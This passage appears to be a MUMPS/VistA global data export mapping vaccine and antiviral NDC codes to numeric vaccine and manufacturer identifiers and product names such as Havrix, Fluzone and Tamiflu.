"DATA",9002084.95,364,0)
00006-4109-01^178^128^GARDASIL^^0
"DATA",9002084.95,365,0)
00006-4109-31^178^128^GARDASIL^^0
"DATA",9002084.95,366,0)
00006-4109-09^178^128^GARDASIL^^0
"DATA",9002084.95,367,0)
00006-4109-06^178^128^GARDASIL^^0
"DATA",9002084.95,368,0)
00007-0837-35^196^142^HAVRIX^^0
"DATA",9002084.95,369,0)
58160-825-52^196^142^HAVRIX^^0
"DATA",9002084.95,370,0)
58160-837-50^196^142^HAVRIX^^0
"DATA",9002084.95,371,0)
58160-837-46^196^142^HAVRIX^^0
"DATA",9002084.95,372,0)
58160-837-05^196^142^HAVRIX^^0
"DATA",9002084.95,373,0)
58160-837-02^196^142^HAVRIX^^0
"DATA",9002084.95,374,0)
58160-837-11^196^142^HAVRIX^^0
"DATA",9002084.95,375,0)
58160-837-01^196^142^HAVRIX^^0
"DATA",9002084.95,376,0)
58160-837-58^196^142^HAVRIX^^0
"DATA",9002084.95,377,0)
00006-4831-00^196^128^VAQTA^^0
"DATA",9002084.95,378,0)
00006-4831-41^196^128^VAQTA^^0
"DATA",9002084.95,379,0)
58160-825-11^196^142^HAVRIX^^0
"DATA",9002084.95,380,0)
58160-825-46^196^142^HAVRIX^^0
"DATA",9002084.95,381,0)
58160-825-41^196^142^HAVRIX^^0
"DATA",9002084.95,382,0)
58160-837-32^196^142^HAVRIX^^0
"DATA",9002084.95,383,0)
58160-825-51^196^142^HAVRIX^^0
"DATA",9002084.95,384,0)
00007-0837-32^196^142^HAVRIX^^0
"DATA",9002084.95,385,0)
00007-0837-01^196^142^HAVRIX^^0
"DATA",9002084.95,386,0)
00007-0837-11^196^142^HAVRIX^^0
"DATA",9002084.95,387,0)
00007-0837-26^196^142^HAVRIX^^0
"DATA",9002084.95,388,0)
00007-0837-50^196^142^HAVRIX^^0
"DATA",9002084.95,389,0)
00007-0837-46^196^142^HAVRIX^^0
"DATA",9002084.95,390,0)
00007-0837-58^196^142^HAVRIX^^0
"DATA",9002084.95,391,0)
00007-0837-56^196^142^HAVRIX^^0
"DATA",9002084.95,392,0)
58160-825-01^196^142^HAVRIX^^0
"DATA",9002084.95,393,0)
58160-835-32^196^142^HAVRIX^^0
"DATA",9002084.95,394,0)
13533-635-03^198^152^GAMASTAN^^0
"DATA",9002084.95,395,0)
13533-635-04^198^152^GAMASTAN^^0
"DATA",9002084.95,396,0)
12806-0802-9^^^TAMIFLU
"DATA",9002084.95,397,0)
0004-0802-08^^^TAMIFLU
"DATA",9002084.95,398,0)
54569-4888-0^^^TAMIFLU
"DATA",9002084.95,399,0)
66267-656-02^^^TAMIFLU
"DATA",9002084.95,400,0)
00004-0810-95^^^TAMIFLU
"DATA",9002084.95,401,0)
0004-0802-85^^^TAMIFLU
"DATA",9002084.95,402,0)
0004-0800-85^^^TAMIFLU
"DATA",9002084.95,403,0)
0004-0800-09^^^TAMIFLU
"DATA",9002084.95,404,0)
12806-0800-9^^^TAMIFLU
"DATA",9002084.95,405,0)
12806-0801-9^^^TAMIFLU
"DATA",9002084.95,406,0)
0004-0801-08^^^TAMIFLU
"DATA",9002084.95,407,0)
12806-0810-8^^^TAMIFLU
"DATA",9002084.95,408,0)
63552-800-9^^^TAMIFLU
"DATA",9002084.95,409,0)
55887-851-10^^^TAMIFLU
"DATA",9002084.95,410,0)
0004-0800-06^^^TAMIFLU
"DATA",9002084.95,411,0)
60937-0681-2^^142^RELENZA^^0
"DATA",9002084.95,412,0)
54868-4377-0^^142^RELENZA^^0
"DATA",9002084.95,413,0)
00173-0681-00^^142^RELENZA^^0
"DATA",9002084.95,414,0)
00173-0681-01^^142^RELENZA^^0
"DATA",9002084.95,415,0)
60937-0681-1^^142^RELENZA^^0
"DATA",9002084.95,416,0)
60937-0681-0^^142^RELENZA^^0
"DATA",9002084.95,417,0)
00173-0681-22^^142^RELENZA^^0
"DATA",9002084.95,418,0)
60574-4111-1^141^125^SYNAGIS^^0
"DATA",9002084.95,419,0)
60574-4112-1^141^125^SYNAGIS^^0
"DATA",9002084.95,420,0)
60574-4113-1^141^125^SYNAGIS^^0
"DATA",9002084.95,421,0)
60574-4114-1^141^125^SYNAGIS^^0
"DATA",9002084.95,422,0)
00006-4999-00^201^128^PROQUAD^^0
"DATA",9002084.95,423,0)
00006-4984-00^201^128^PROQUAD^^0
"DATA",9002084.95,424,0)
49281-752-22^203^137^TUBERSOL^^0
"DATA",9002084.95,425,0)
64029-4525-1^203^136^APLISOL^^0
"DATA",9002084.95,426,0)
42023-104-05^203^136^APLISOL^^0
"DATA",9002084.95,427,0)
42023-104-01^203^136^APLISOL^^0
"DATA",9002084.95,428,0)
64029-4525-2^203^136^APLISOL^^0
"DATA",9002084.95,429,0)
49281-752-21^203^137^TUBERSOL^^0
"DATA",9002084.95,430,0)
19515-0888-07^243^142^Flulaval
"DATA",9002084.95,431,0)
58160-826-52^168^142^Havrix^^0
"DATA",9002084.95,432,0)
65044-2161-01^153^127^Biothrax
"DATA",9002084.95,433,0)
00052-0602-02^116^134^Tice
"DATA",9002084.95,434,0)
00052-0603-01^116^134^Tice
"DATA",9002084.95,435,0)
00052-0603-02^116^134^Tice
"DATA",9002084.95,436,0)
48642-9041-01^116^134^Tice
"DATA",9002084.95,437,0)
65289-1102-01^116^135^Pacis
"DATA",9002084.95,438,0)
11793-8802-01^116^137^TheraCys
"DATA",9002084.95,439,0)
46331-0280-11^113^100^Cholera-I
"DATA",9002084.95,441,0)
46331-0280-15^113^100^Cholera-I
"DATA",9002084.95,443,0)
11793-2860-01^211^137^DAPTACEL
"DATA",9002084.95,444,0)
11793-2860-05^211^137^DAPTACEL
"DATA",9002084.95,445,0)
11793-2861-00^211^137^DAPTACEL
"DATA",9002084.95,446,0)
49281-0286-01^211^137^DAPTACEL
"DATA",9002084.95,447,0)
49281-0286-05^211^137^DAPTACEL
"DATA",9002084.95,448,0)
49281-0286-10^211^137^DAPTACEL
"DATA",9002084.95,450,0)
58160-0811-01^216^142^Pediarix
"DATA",9002084.95,451,0)
58160-0811-11^216^142^Pediarix
"DATA",9002084.95,452,0)
58160-0811-41^216^142^Pediarix
"DATA",9002084.95,453,0)
58160-0811-46^216^142^Pediarix
"DATA",9002084.95,454,0)
58160-0811-51^216^142^Pediarix
"DATA",9002084.95,458,0)
49281-0510-05^226^137^Pentacel
"DATA",9002084.95,459,0)
49281-0560-05^226^137^Pentacel
"DATA",9002084.95,461,0)
58160-0812-01^230^142^Kinrix
"DATA",9002084.95,462,0)
58160-0812-11^230^142^Kinrix
"DATA",9002084.95,463,0)
58160-0812-41^230^142^Kinrix
"DATA",9002084.95,464,0)
58160-0812-46^230^142^Kinrix
"DATA",9002084.95,467,0)
58160-0812-52^230^142^Kinrix
"DATA",9002084.95,468,0)
00005-1800-31^133^160^Acel-Imune
"DATA",9002084.95,469,0)
58160-0810-01^133^142^Infanrix
"DATA",9002084.95,470,0)
58160-0810-11^133^142^Infanrix
"DATA",9002084.95,471,0)
58160-0810-41^133^142^Infanrix
"DATA",9002084.95,472,0)
58160-0810-46^133^142^Infanrix
"DATA",9002084.95,473,0)
58160-0810-52^133^142^Infanrix
"DATA",9002084.95,474,0)
58160-0840-01^133^142^Infanrix
"DATA",9002084.95,475,0)
58160-0840-11^133^142^Infanrix
"DATA",9002084.95,476,0)
58160-0840-41^133^142^Infanrix
"DATA",9002084.95,481,0)
49281-0282-15^133^137^Tripedia
"DATA",9002084.95,482,0)
49281-0288-05^133^137^Tripedia
"DATA",9002084.95,483,0)
49281-0288-15^133^137^Tripedia
"DATA",9002084.95,484,0)
49281-0298-05^133^137^Tripedia
"DATA",9002084.95,485,0)
49281-0298-10^133^137^Tripedia
"DATA",9002084.95,487,0)
14645-0549-10^151^160^Tetramune
"DATA",9002084.95,488,0)
49281-0549-10^151^160^Tetramune
"DATA",9002084.95,489,0)
49281-0549-84^151^160^Tetramune
"DATA",9002084.95,490,0)
00005-1858-31^123^137^DT
"DATA",9002084.95,491,0)
14362-0113-05^123^137^DT
"DATA",9002084.95,492,0)
46331-0210-05^123^137^DT
"DATA",9002084.95,493,0)
46331-0210-11^123^137^DT
"DATA",9002084.95,494,0)
46331-0211-07^123^137^DT
"DATA",9002084.95,495,0)
46331-0211-09^123^137^DT
"DATA",9002084.95,496,0)
49281-0275-10^123^137^DT
"DATA",9002084.95,497,0)
49281-0278-10^123^137^DT
"DATA",9002084.95,499,0)
14645-0597-05^166^137^TriHIBit
"DATA",9002084.95,500,0)
14645-0597-06^166^137^TriHIBit
"DATA",9002084.95,501,0)
49281-0597-05^166^137^TriHIBit
"DATA",9002084.95,502,0)
42515-0001-01^240^159^IXIARO
"DATA",9002084.95,503,0)
49281-0680-20^161^120^JE-Vax
"DATA",9002084.95,504,0)
49281-0680-30^161^120^JE-Vax
"DATA",9002084.95,505,0)
49281-0680-50^161^120^JE-Vax
"DATA",9002084.95,506,0)
61445-0680-20^161^120^JE-Vax
"DATA",9002084.95,507,0)
61445-0680-30^161^120^JE-Vax
"DATA",9002084.95,508,0)
61445-0680-50^161^120^JE-Vax
"DATA",9002084.95,509,0)
58160-0830-01^224^142^Cervarix
"DATA",9002084.95,510,0)
58160-0830-11^224^142^Cervarix
"DATA",9002084.95,511,0)
58160-0830-32^224^142^Cervarix
"DATA",9002084.95,512,0)
58160-0830-46^224^142^Cervarix
"DATA",9002084.95,513,0)
43063-0083-01^178^128^Gardasil
"DATA",9002084.95,514,0)
55045-3585-01^209^142^Twinrix
"DATA",9002084.95,515,0)
58160-0815-01^209^142^Twinrix
"DATA",9002084.95,516,0)
58160-0815-11^209^142^Twinrix
"DATA",9002084.95,517,0)
58160-0815-41^209^142^Twinrix
"DATA",9002084.95,518,0)
58160-0815-46^209^142^Twinrix
"DATA",9002084.95,519,0)
58160-0815-48^209^142^Twinrix
"DATA",9002084.95,520,0)
58160-0815-52^209^142^Twinrix
"DATA",9002084.95,525,0)
58160-0850-11^209^142^Twinrix
"DATA",9002084.95,526,0)
58160-0826-01^168^142^Havrix-Adult
"DATA",9002084.95,527,0)
58160-0826-11^168^142^Havrix-Adult
"DATA",9002084.95,528,0)
58160-0826-41^168^142^Havrix-Adult
"DATA",9002084.95,529,0)
58160-0826-46^168^142^Havrix-Adult
"DATA",9002084.95,530,0)
58160-0835-11^168^142^Havrix-Adult
"DATA",9002084.95,531,0)
58160-0835-46^168^142^Havrix-Adult
"DATA",9002084.95,534,0)
58160-0826-48^168^142^Havrix-Adult
"DATA",9002084.95,535,0)
00006-4096-09^168^128^VAQTA-Adult
"DATA",9002084.95,536,0)
00006-4096-31^168^128^VAQTA-Adult
"DATA",9002084.95,537,0)
00006-4845-00^168^128^VAQTA-Adult
"DATA",9002084.95,538,0)
19650-0844-00^168^128^VAQTA-Adult
"DATA",9002084.95,539,0)
19650-0844-38^168^128^VAQTA-Adult
"DATA",9002084.95,540,0)
00007-0825-11^196^142^Havrix-Peds 2 Dose
"DATA",9002084.95,541,0)
00007-0825-46^196^142^Havrix-Peds 2 Dose
"DATA",9002084.95,542,0)
54868-4056-00^196^142^Havrix-Peds 2 Dose
"DATA",9002084.95,543,0)
54868-4056-01^196^142^Havrix-Peds 2 Dose
"DATA",9002084.95,544,0)
58160-0825-01^196^142^Havrix-Peds 2 Dose
"DATA",9002084.95,545,0)
58160-0825-11^196^142^Havrix-Peds 2 Dose
"DATA",9002084.95,546,0)
58160-0825-41^196^142^Havrix-Peds 2 Dose
"DATA",9002084.95,547,0)
58160-0825-46^196^142^Havrix-Peds 2 Dose
"DATA",9002084.95,548,0)
58160-0825-51^196^142^Havrix-Peds 2 Dose
"DATA",9002084.95,549,0)
58160-0825-52^196^142^Havrix-Peds 2 Dose
"DATA",9002084.95,550,0)
58160-0837-01^196^142^Havrix-Peds 2 Dose
"DATA",9002084.95,555,0)
00006-4095-01^196^128^VAQTA-Peds 2 Dose
"DATA",9002084.95,556,0)
00006-4095-06^196^128^VAQTA-Peds 2 Dose
"DATA",9002084.95,557,0)
00006-4095-09^196^128^VAQTA-Peds 2 Dose
"DATA",9002084.95,558,0)
00006-4096-01^196^128^VAQTA-Peds 2 Dose
"DATA",9002084.95,559,0)
19650-0845-00^196^128^VAQTA-Peds 2 Dose
"DATA",9002084.95,560,0)
19650-0845-38^196^128^VAQTA-Peds 2 Dose
"DATA",9002084.95,561,0)
58160-0820-01^138^142^Engerix-B Peds
"DATA",9002084.95,562,0)
58160-0820-11^138^142^Engerix-B Peds
"DATA",9002084.95,563,0)
58160-0820-32^138^142^Engerix-B Peds
"DATA",9002084.95,564,0)
58160-0820-46^138^142^Engerix-B Peds
"DATA",9002084.95,565,0)
58160-0820-51^138^142^Engerix-B Peds
"DATA",9002084.95,569,0)
58160-0820-52^138^142^Engerix-B Peds
"DATA",9002084.95,570,0)
00006-4721-00^138^128^H-B-Vax
"DATA",9002084.95,571,0)
00006-4413-47^138^128^H-B-Vax II
"DATA",9002084.95,572,0)
00006-4415-47^138^128^H-B-Vax II
"DATA",9002084.95,573,0)
00006-4775-47^138^128^H-B-Vax II
"DATA",9002084.95,574,0)
00006-4779-16^138^128^H-B-Vax II
"DATA",9002084.95,575,0)
00006-4779-47^138^128^H-B-Vax II
"DATA",9002084.95,576,0)
00006-4093-01^138^128^Recombivax Peds
"DATA",9002084.95,577,0)
00006-4093-06^138^128^Recombivax Peds
"DATA",9002084.95,578,0)
00006-4093-09^138^128^Recombivax Peds
"DATA",9002084.95,579,0)
00006-4980-00^138^128^Recombivax Peds
"DATA",9002084.95,580,0)
19650-0848-00^138^128^Recombivax Peds
"DATA",9002084.95,581,0)
19650-0851-00^138^128^Recombivax Peds
"DATA",9002084.95,602,0)
54868-0734-00^144^142^Engerix-B Adult
"DATA",9002084.95,603,0)
55045-3525-01^144^142^Engerix-B Adult
"DATA",9002084.95,604,0)
58160-0821-01^144^142^Engerix-B Adult
"DATA",9002084.95,605,0)
58160-0821-11^144^142^Engerix-B Adult
"DATA",9002084.95,606,0)
58160-0821-31^144^142^Engerix-B Adult
"DATA",9002084.95,607,0)
58160-0821-46^144^142^Engerix-B Adult
"DATA",9002084.95,608,0)
58160-0821-48^144^142^Engerix-B Adult
"DATA",9002084.95,609,0)
58160-0821-52^144^142^Engerix-B Adult
"DATA",9002084.95,610,0)
58160-0856-01^144^142^Engerix-B Adult
"DATA",9002084.95,611,0)
58160-0857-01^144^142^Engerix-B Adult
"DATA",9002084.95,612,0)
58160-0857-46^144^142^Engerix-B Adult
"DATA",9002084.95,613,0)
58160-0860-01^144^142^Engerix-B Adult
"DATA",9002084.95,614,0)
58160-0861-35^144^142^Engerix-B Adult
"DATA",9002084.95,619,0)
68258-3042-01^144^142^Engerix-B Adult
"DATA",9002084.95,620,0)
00006-4094-01^144^128^Recombivax-Adult
"DATA",9002084.95,621,0)
00006-4094-31^144^128^Recombivax-Adult
"DATA",9002084.95,622,0)
54868-2219-00^144^128^Recombivax-Adult
"DATA",9002084.95,623,0)
54868-2219-01^144^128^Recombivax-Adult
"DATA",9002084.95,646,0)
00006-4992-00^110^128^HepB
"DATA",9002084.95,653,0)
49281-0541-01^128^137^ProHIBit
"DATA",9002084.95,654,0)
49281-0541-05^128^137^ProHIBit
"DATA",9002084.95,655,0)
49281-0541-10^128^137^ProHIBit
"DATA",9002084.95,656,0)
14645-0408-10^136^137^ActHib
"DATA",9002084.95,657,0)
14645-0545-05^136^137^ActHib
"DATA",9002084.95,658,0)
49281-0545-05^136^137^ActHib
"DATA",9002084.95,659,0)
49281-0545-10^136^137^ActHib
"DATA",9002084.95,661,0)
58160-0806-05^136^142^Hiberix
"DATA",9002084.95,663,0)
14645-0440-05^136^137^OmniHib
"DATA",9002084.95,664,0)
00006-4877-00^127^128^PedvaxHIB
"DATA",9002084.95,668,0)
14362-0117-02^147^100^TIg
"DATA",9002084.95,680,0)
17090-0052-15^147^140^Tetanus Antitoxin
"DATA",9002084.95,681,0)
17090-0052-30^147^140^Tetanus Antitoxin
"DATA",9002084.95,682,0)
17090-0052-55^147^140^Tetanus Antitoxin
"DATA",9002084.95,683,0)
46331-0012-02^147^140^Tetanus Antitoxin
"DATA",9002084.95,684,0)
46331-0012-39^147^140^Tetanus Antitoxin
"DATA",9002084.95,685,0)
14645-0180-10^158^137^IMOGAM Rabies-HT
"DATA",9002084.95,686,0)
14645-0180-20^158^137^IMOGAM Rabies-HT
"DATA",9002084.95,687,0)
14645-0190-10^158^137^IMOGAM Rabies-HT
"DATA",9002084.95,688,0)
14645-0190-20^158^137^IMOGAM Rabies-HT
"DATA",9002084.95,689,0)
49281-0190-10^158^137^IMOGAM Rabies-HT
"DATA",9002084.95,690,0)
49281-0190-20^158^137^IMOGAM Rabies-HT
"DATA",9002084.95,697,0)
14362-0118-01^159^100^VZIg
"DATA",9002084.95,709,0)
14362-0118-02^159^100^VZIg
"DATA",9002084.95,721,0)
60492-0173-01^192^100^Vaccinia VIG
"DATA",9002084.95,733,0)
13533-0635-03^198^152^GamaSTAN
"DATA",9002084.95,734,0)
14362-0115-01^198^100^Ig
"DATA",9002084.95,746,0)
14362-0115-02^198^100^Ig
"DATA",9002084.95,758,0)
44206-0417-06^199^155^Carimune
"DATA",9002084.95,759,0)
64193-0250-50^199^107^IVEEGAM
"DATA",9002084.95,760,0)
68209-0843-01^199^135^Octagam
"DATA",9002084.95,761,0)
68209-0843-02^199^135^Octagam
"DATA",9002084.95,762,0)
68209-0843-03^199^135^Octagam
"DATA",9002084.95,763,0)
68209-0843-04^199^135^Octagam
"DATA",9002084.95,764,0)
68209-0843-05^199^135^Octagam
"DATA",9002084.95,772,0)
60492-0051-01^129^147^HepaGam B
"DATA",9002084.95,773,0)
60492-0052-01^129^147^HepaGam B
"DATA",9002084.95,774,0)
60505-6071-00^129^147^HepaGam B
"DATA",9002084.95,776,0)
60505-6072-00^129^147^HepaGam B
"DATA",9002084.95,778,0)
60505-6073-00^129^147^HepaGam B
"DATA",9002084.95,780,0)
60505-6074-00^129^147^HepaGam B
"DATA",9002084.95,782,0)
66914-1007-01^129^158^Nabi-HB
"DATA",9002084.95,783,0)
66914-1008-01^129^158^Nabi-HB
"DATA",9002084.95,784,0)
14362-2101-01^186^124^Respigam
"DATA",9002084.95,788,0)
60574-2101-01^186^124^Respigam
"DATA",9002084.95,790,0)
60574-2102-01^186^124^Respigam
"DATA",9002084.95,792,0)
60574-4111-01^141^100^Synagis
"DATA",9002084.95,804,0)
60574-4112-01^141^100^Synagis
"DATA",9002084.95,816,0)
60574-4113-01^141^100^Synagis
"DATA",9002084.95,828,0)
60574-4114-01^141^100^Synagis
"DATA",9002084.95,840,0)
66019-0200-01^231^125^H1N1 Nasal
"DATA",9002084.95,841,0)
66019-0200-05^231^125^H1N1 Nasal
"DATA",9002084.95,842,0)
33332-0519-01^232^155^H1N1 P-free, CSL
"DATA",9002084.95,843,0)
49281-0650-10^232^137^H1N1 P-free, Sanofi
"DATA",9002084.95,844,0)
49281-0650-25^232^137^H1N1 P-free, Sanofi
"DATA",9002084.95,845,0)
49281-0650-50^232^137^H1N1 P-free, Sanofi
"DATA",9002084.95,846,0)
49281-0650-70^232^137^H1N1 P-free, Sanofi
"DATA",9002084.95,847,0)
49281-0650-90^232^137^H1N1 P-free, Sanofi
"DATA",9002084.95,848,0)
33332-0629-10^233^155^H1N1 CSL
"DATA",9002084.95,849,0)
66521-0200-10^233^131^H1N1 Novartis
"DATA",9002084.95,850,0)
49281-0640-15^233^137^H1N1 Sanofi Pasteur
"DATA",9002084.95,851,0)
49281-0600-01^229^137^Influenza-H5N1
"DATA",9002084.95,852,0)
66019-0106-01^217^125^FluMist
"DATA",9002084.95,853,0)
66019-0107-01^217^125^FluMist
"DATA",9002084.95,854,0)
66019-0108-01^217^125^FluMist
"DATA",9002084.95,855,0)
66019-0108-05^217^125^FluMist
"DATA",9002084.95,856,0)
66019-0108-10^217^125^FluMist
"DATA",9002084.95,857,0)
66019-0109-10^217^125^FluMist
"DATA",9002084.95,861,0)
66521-0113-99^217^125^FluMist
"DATA",9002084.95,862,0)
49281-0011-50^236^137^Fluzone High-Dose
"DATA",9002084.95,863,0)
49281-0387-65^236^137^Fluzone High-Dose
"DATA",9002084.95,864,0)
49281-0389-65^236^137^Fluzone High-Dose
"DATA",9002084.95,865,0)
54868-6177-00^236^137^Fluzone High-Dose
"DATA",9002084.95,866,0)
54868-6180-00^236^137^Fluzone High-Dose
"DATA",9002084.95,867,0)
33332-0007-01^242^155^AFLURIA Pres-Free
"DATA",9002084.95,868,0)
33332-0008-01^242^155^AFLURIA Pres-Free
"DATA",9002084.95,869,0)
33332-0009-01^242^155^AFLURIA Pres-Free
"DATA",9002084.95,870,0)
33332-0010-01^242^155^AFLURIA Pres-Free
"DATA",9002084.95,871,0)
33332-0011-01^242^155^AFLURIA Pres-Free
"DATA",9002084.95,872,0)
33332-0110-10^242^155^AFLURIA Pres-Free
"DATA",9002084.95,876,0)
15559-0874-41^242^142^Fluarix Pres-Free
"DATA",9002084.95,877,0)
15559-0874-46^242^142^Fluarix Pres-Free
"DATA",9002084.95,878,0)
15559-0875-41^242^142^Fluarix Pres-Free
"DATA",9002084.95,879,0)
15559-0875-43^242^142^Fluarix Pres-Free
"DATA",9002084.95,880,0)
58160-0875-41^242^142^Fluarix Pres-Free
"DATA",9002084.95,881,0)
58160-0875-46^242^142^Fluarix Pres-Free
"DATA",9002084.95,882,0)
58160-0876-41^242^142^Fluarix Pres-Free
"DATA",9002084.95,883,0)
58160-0876-46^242^142^Fluarix Pres-Free
"DATA",9002084.95,884,0)
58160-0877-41^242^142^Fluarix Pres-Free
"DATA",9002084.95,885,0)
58160-0877-46^242^142^Fluarix Pres-Free
"DATA",9002084.95,886,0)
58160-0878-52^242^142^Fluarix Pres-Free
"DATA",9002084.95,890,0)
66521-0114-02^242^131^Fluvirin Pres-Free
"DATA",9002084.95,892,0)
49281-0010-10^242^137^Fluzone Pres-Free
"DATA",9002084.95,893,0)
49281-0010-25^242^137^Fluzone Pres-Free
"DATA",9002084.95,894,0)
49281-0010-50^242^137^Fluzone Pres-Free
"DATA",9002084.95,895,0)
49281-0011-10^242^137^Fluzone Pres-Free
"DATA",9002084.95,896,0)
49281-0009-25^242^137^Fluzone Pres-Free
"DATA",9002084.95,935,0)
33332-0107-10^243^155^AFLURIA
"DATA",9002084.95,936,0)
33332-0108-10^243^155^AFLURIA
"DATA",9002084.95,937,0)
33332-0109-10^243^155^AFLURIA
"DATA",9002084.95,938,0)
33332-0111-10^243^155^AFLURIA
"DATA",9002084.95,941,0)
19515-0885-07^243^142^FluLaval
"DATA",9002084.95,942,0)
19515-0886-07^243^142^FluLaval
"DATA",9002084.95,943,0)
19515-0887-07^243^142^FluLaval
"DATA",9002084.95,946,0)
00008-0980-35^243^160^FluShield
"DATA",9002084.95,947,0)
54868-4124-00^243^136^Fluogen
"DATA",9002084.95,948,0)
19650-0100-01^243^131^Fluvirin
"DATA",9002084.95,949,0)
19650-0100-10^243^131^Fluvirin
"DATA",9002084.95,950,0)
19650-0102-01^243^131^Fluvirin
"DATA",9002084.95,951,0)
19650-0102-10^243^131^Fluvirin
"DATA",9002084.95,952,0)
21695-0632-05^243^131^Fluvirin
"DATA",9002084.95,953,0)
54868-5813-00^243^131^Fluvirin
"DATA",9002084.95,954,0)
66521-0104-01^243^131^Fluvirin
"DATA",9002084.95,955,0)
66521-0104-10^243^131^Fluvirin
"DATA",9002084.95,956,0)
66521-0105-01^243^131^Fluvirin
"DATA",9002084.95,957,0)
66521-0105-10^243^131^Fluvirin
"DATA",9002084.95,958,0)
66521-0107-01^243^131^Fluvirin
"DATA",9002084.95,959,0)
66521-0107-10^243^131^Fluvirin
"DATA",9002084.95,960,0)
66521-0108-01^243^131^Fluvirin
"DATA",9002084.95,961,0)
66521-0109-01^243^131^Fluvirin
"DATA",9002084.95,962,0)
66521-0109-10^243^131^Fluvirin
"DATA",9002084.95,963,0)
66521-0110-10^243^131^Fluvirin
"DATA",9002084.95,964,0)
66521-0111-01^243^131^Fluvirin
"DATA",9002084.95,965,0)
66521-0111-02^243^131^Fluvirin
"DATA",9002084.95,966,0)
66521-0112-02^243^131^Fluvirin
"DATA",9002084.95,967,0)
66521-0112-10^243^131^Fluvirin
"DATA",9002084.95,968,0)
66521-0113-02^243^131^Fluvirin
"DATA",9002084.95,969,0)
66521-0113-10^243^131^Fluvirin
"DATA",9002084.95,970,0)
66521-0114-10^243^131^Fluvirin
"DATA",9002084.95,976,0)
49281-0005-10^243^137^Fluzone
"DATA",9002084.95,977,0)
49281-0005-25^243^137^Fluzone
"DATA",9002084.95,978,0)
49281-0005-50^243^137^Fluzone
"DATA",9002084.95,979,0)
49281-0006-10^243^137^Fluzone
"DATA",9002084.95,980,0)
49281-0006-25^243^137^Fluzone
"DATA",9002084.95,981,0)
49281-0006-50^243^137^Fluzone
"DATA",9002084.95,982,0)
49281-0007-10^243^137^Fluzone
"DATA",9002084.95,983,0)
49281-0007-25^243^137^Fluzone
"DATA",9002084.95,984,0)
49281-0007-50^243^137^Fluzone
"DATA",9002084.95,985,0)
49281-0008-10^243^137^Fluzone
"DATA",9002084.95,986,0)
49281-0008-25^243^137^Fluzone
"DATA",9002084.95,987,0)
49281-0008-50^243^137^Fluzone
"DATA",9002084.95,988,0)
49281-0009-10^243^137^Fluzone
"DATA",9002084.95,990,0)
49281-0009-50^243^137^Fluzone
"DATA",9002084.95,991,0)
49281-0366-11^243^137^Fluzone
"DATA",9002084.95,992,0)
49281-0366-15^243^137^Fluzone
"DATA",9002084.95,993,0)
49281-0370-11^243^137^Fluzone
"DATA",9002084.95,994,0)
49281-0370-15^243^137^Fluzone
"DATA",9002084.95,995,0)
49281-0371-25^243^137^Fluzone
"DATA",9002084.95,996,0)
49281-0371-50^243^137^Fluzone
"DATA",9002084.95,997,0)
49281-0372-11^243^137^Fluzone
"DATA",9002084.95,998,0)
49281-0372-15^243^137^Fluzone
"DATA",9002084.95,999,0)
49281-0373-25^243^137^Fluzone
"DATA",9002084.95,1000,0)
49281-0376-15^243^137^Fluzone
"DATA",9002084.95,1001,0)
49281-0378-15^243^137^Fluzone
"DATA",9002084.95,1002,0)
49281-0380-15^243^137^Fluzone
"DATA",9002084.95,1003,0)
49281-0382-15^243^137^Fluzone
"DATA",9002084.95,1004,0)
49281-0384-15^243^137^Fluzone
"DATA",9002084.95,1005,0)
49281-0386-15^243^137^Fluzone
"DATA",9002084.95,1006,0)
49281-0388-15^243^137^Fluzone
"DATA",9002084.95,1013,0)
54868-4060-00^243^137^Fluzone
"DATA",9002084.95,1014,0)
66914-1041-01^243^137^Fluzone
"DATA",9002084.95,1015,0)
66914-1041-02^243^137^Fluzone
"DATA",9002084.95,1097,0)
49281-0703-55^248^137^Fluzone Intradermal
"DATA",9002084.95,1099,0)
58160-0845-11^140^142^LYMErix
"DATA",9002084.95,1100,0)
00006-4682-00^117^128^MMR II
"DATA",9002084.95,1101,0)
54868-0980-00^117^128^MMR II
"DATA",9002084.95,1102,0)
00006-4399-00^213^128^MENINGOVAX-AC
"DATA",9002084.95,1103,0)
49281-0589-01^220^137^Menactra
"DATA",9002084.95,1104,0)
49281-0589-05^220^137^Menactra
"DATA",9002084.95,1105,0)
49281-0589-11^220^137^Menactra
"DATA",9002084.95,1106,0)
49281-0589-15^220^137^Menactra
"DATA",9002084.95,1108,0)
46028-0208-01^237^131^Menveo
"DATA",9002084.95,1110,0)
49281-0488-91^134^137^MENOMUNE
"DATA",9002084.95,1111,0)
49281-0488-95^134^137^MENOMUNE
"DATA",9002084.95,1112,0)
49281-0489-01^134^137^MENOMUNE
"DATA",9002084.95,1113,0)
49281-0489-05^134^137^MENOMUNE
"DATA",9002084.95,1114,0)
49281-0489-91^134^137^MENOMUNE
"DATA",9002084.95,1115,0)
00006-4753-00^115^128^Mumpsvax
"DATA",9002084.95,1116,0)
55154-8958-07^142^160^Prevnar7
"DATA",9002084.95,1117,0)
00005-2309-33^119^160^PNU-IMUNE 23
"DATA",9002084.95,1118,0)
19650-0894-00^119^128^Pneumovax 23
"DATA",9002084.95,1119,0)
54868-3339-01^119^128^Pneumovax 23
"DATA",9002084.95,1120,0)
68788-4739-01^119^128^Pneumovax 23
"DATA",9002084.95,1121,0)
14645-0860-10^107^137^IPOL
"DATA",9002084.95,1122,0)
14645-0860-51^107^137^IPOL
"DATA",9002084.95,1123,0)
14645-0860-52^107^137^IPOL
"DATA",9002084.95,1124,0)
14645-0860-55^107^137^IPOL
"DATA",9002084.95,1125,0)
49281-0860-10^107^137^IPOL
"DATA",9002084.95,1126,0)
49281-0860-51^107^137^IPOL
"DATA",9002084.95,1127,0)
49281-0860-52^107^137^IPOL
"DATA",9002084.95,1128,0)
49281-0860-55^107^137^IPOL
"DATA",9002084.95,1131,0)
11793-7503-01^107^137^Polio
"DATA",9002084.95,1132,0)
11793-7503-02^107^137^Polio
"DATA",9002084.95,1133,0)
11793-8603-01^107^137^Poliovax
"DATA",9002084.95,1134,0)
11793-8603-02^107^137^Poliovax
"DATA",9002084.95,1153,0)
14645-0250-10^150^137^Imovax Rabies IM
"DATA",9002084.95,1154,0)
14645-0250-51^150^137^Imovax Rabies IM
"DATA",9002084.95,1155,0)
49281-0250-10^150^137^Imovax Rabies IM
"DATA",9002084.95,1156,0)
49281-0250-51^150^137^Imovax Rabies IM
"DATA",9002084.95,1157,0)
53905-0501-01^150^131^RabAvert
"DATA",9002084.95,1158,0)
63851-0501-01^150^131^RabAvert
"DATA",9002084.95,1159,0)
14645-0251-20^162^137^Imovax Rabies ID
"DATA",9002084.95,1160,0)
49281-0251-20^162^137^Imovax Rabies ID
"DATA",9002084.95,1161,0)
58160-0805-01^225^142^Rotarix
"DATA",9002084.95,1162,0)
